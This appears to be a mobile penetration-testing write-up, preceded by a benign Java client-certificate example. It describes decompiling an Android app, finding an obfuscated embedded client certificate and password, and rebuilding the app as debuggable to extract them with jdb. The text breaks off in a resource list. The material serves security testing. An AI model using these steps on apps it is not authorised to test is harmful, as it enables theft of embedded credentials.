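import java.io.InputStream;
import java.net.URL;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.security.KeyStore;
import java.util.Arrays;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.KeyManagerFactory;
import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLSocketFactory;

/**
 * Added example: the standard Java sequence for presenting a client
 * certificate over HTTPS (KeyStore -> KeyManagerFactory -> SSLContext ->
 * SSLSocketFactory -> HttpsURLConnection). Not the analyzed app's code.
 */
public final class ClientCertHttps {

    /**
     * Builds an SSLSocketFactory that offers the client certificate held in
     * the given PKCS#12 container during the TLS handshake.
     * The password array is zeroed before returning.
     */
    static SSLSocketFactory buildSocketFactory(InputStream pkcs12, char[] password)
            throws Exception {
        // Load the client certificate and its private key from the PKCS#12 stream.
        // Whatever produced this stream and password (resource file, decrypted
        // blob, ...) is observable in memory once a debugger is attached.
        KeyStore keyStore = KeyStore.getInstance("PKCS12");
        keyStore.load(pkcs12, password);

        // KeyManagerFactory turns the KeyStore into the KeyManager[] that
        // selects the client certificate when the server requests one.
        KeyManagerFactory kmf =
                KeyManagerFactory.getInstance(KeyManagerFactory.getDefaultAlgorithm());
        kmf.init(keyStore, password);
        Arrays.fill(password, '\0'); // key material is now inside the KeyManager

        // init(KeyManager[], TrustManager[], SecureRandom): passing null for the
        // trust managers keeps the platform's default trust store for server
        // certificate validation, so only client authentication is customized.
        SSLContext ctx = SSLContext.getInstance("TLS");
        ctx.init(kmf.getKeyManagers(), null, null);
        return ctx.getSocketFactory();
    }

    /**
     * Attaches the factory to one connection. HttpsURLConnection's
     * setDefaultSSLSocketFactory would instead apply it process-wide.
     */
    static HttpsURLConnection open(URL url, SSLSocketFactory factory) throws Exception {
        HttpsURLConnection conn = (HttpsURLConnection) url.openConnection();
        conn.setSSLSocketFactory(factory);
        return conn;
    }

    public static void main(String[] args) throws Exception {
        // Hypothetical inputs: args[0] = path to a .p12 file, args[1] = its password,
        // args[2] = an HTTPS URL that requires client authentication.
        try (InputStream in = Files.newInputStream(Paths.get(args[0]))) {
            SSLSocketFactory factory = buildSocketFactory(in, args[1].toCharArray());
            HttpsURLConnection conn = open(new URL(args[2]), factory);
            System.out.println("HTTP " + conn.getResponseCode());
        }
    }
}
```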
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Instantiating a </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyStore</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and loading an </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">InputStream</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> for a client certificate are central to SSL client authentication support. So I searched the decompiled code for </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyStore</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> class usage and the corresponding instance variables, and identified the classes and methods that were potentially configuring the client-side SSL certificate for </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HttpsURLConnection</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: large; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Locating the Debug Points</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I continued to eliminate </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyStore</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> usages till I identified the class and method I was interested in. The identified class and method did not refer to any resource files to get the client certificate and its password but relied on a couple of function calls to get the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">byte[]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> representation of the client certificate and the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">String</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> representation of the password before feeding them to the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">load</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> method of the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyStore</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instance. Following the code paths led me to the two magic strings that I was looking for. They appeared to be </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Base64</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> encoded values of the client certificate and the corresponding password. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Base64</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> decoding them returned gibberish which could not be put to any practical use as there was more to the encoded values than plain </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Base64</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> encoding. Further analysis revealed that they were subjected to standard crypto algorithms, and those algorithms were fed their Initialization Vectors and Encryption Keys from other Java classes. Additionally, the application also used some custom data manipulation tricks to further obfuscate them.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">With limited time at hand I decided to briefly shelve the code analysis and move to application debugging to inspect the exact code points of interest for data extraction. To help with the debugging process, I noted down the class name, method name, and instance variable of interest where the potential client certificate and password were fed to the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyStore</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instance. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: large; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Setting up the Application for Debugging</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Reviewing </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">AndroidManifest.xml</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> of the decompiled application indicated that the application was not compiled with the debug flag and hence could not be debugged on a device. So I added the debug flag, recompiled it, signed the application and then installed it on the device. The following steps summarize the process of creating debuggable versions of existing Android applications if you plan to debug the application on an actual device.</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Decompile the application with </span><a href="http://forum.xda-developers.com/showthread.php?t=1989533" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">apktool</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Add </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">android:debuggable="true"</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><a href="http://developer.android.com/tools/device.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">attribute</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">application</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> element in the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">AndroidManifest.xml</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Recompile the application with </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">apktool</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Sign the application with </span><a href="http://www.adbtoolkit.com/kitchen/tools/linux/signapk-README.txt" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">SignApk</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Install the application</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The image below shows the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">debuggable</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> attribute added to the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">AndroidManifest.xml</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> file of the target application.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1sZeRdpu6fwJ89iLmP8qUADNH-fMRNN7QhUoFmZpMduDp9Abba8mctwT7NWrLI0sRDOyYg71wN13Xvrl-vsjDpJPrRNtNVQMVunyTPe6uDie-e9IrwKpBhjt-Z9U4I5dZ-iQrp5B4RpT_/s1600/debug-flag-added.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="151" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1sZeRdpu6fwJ89iLmP8qUADNH-fMRNN7QhUoFmZpMduDp9Abba8mctwT7NWrLI0sRDOyYg71wN13Xvrl-vsjDpJPrRNtNVQMVunyTPe6uDie-e9IrwKpBhjt-Z9U4I5dZ-iQrp5B4RpT_/s400/debug-flag-added.png" width="400" /></a></div>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If you are using an emulator, you can extract the application from the device, install it on the emulator and attach a debugger without decompiling or adding the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">debuggable </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">attribute to the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">AndroidManifest.xml</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> file.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let us now look at some of the important pieces of the debugging setup that was used.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-size: large;"><span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Java Debug Wire Protocol (</span><a href="http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: 'Courier New'; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">JDWP</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">)</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The Java Debug Wire Protocol is a protocol used for communication between a </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">JDWP</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> compliant debugger and the Java Virtual Machine. The Dalvik Virtual Machine that is responsible for running the applications on Android devices supports </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">JDWP</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> as its debugging protocol. Each application that runs on a Dalvik VM exposes a unique port to which </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">JDWP</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> compliant debuggers can attach and debug the application. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Once the application was installed on the device in debug mode, the next step was to attach a </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">JDWP</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> compliant debugger, such as </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">jdb</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, and get going. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-size: large;"><a href="http://docs.oracle.com/javase/7/docs/technotes/tools/windows/jdb.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">jdb</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> – The Java Debugger</span></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">jdb</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> is a JDWP compatible command-line debugger that ships with the Java JDK, and I use </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">jdb</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> for its command-line goodness. The typical process of attaching </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">jdb</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to an Android application is summarized below:</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Launch the application that you want to debug</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Obtain its process ID</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Use </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">adb</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to port forward JDWP connection to the application JDWP port</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Attach </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">jdb</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to the application</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Set breakpoints and debug the application</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The following resources can get you started on </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">jdb</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> debugging with Android.</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Using various JDB commands - </span><a href="http://droiddebugger.blogspot.com/2012/05/droiddebugger.html#!/2012/05/droiddebugger.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://droiddebugger.blogspot.com/2012/05/droiddebugger.html#!/2012/05/droiddebugger.html</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
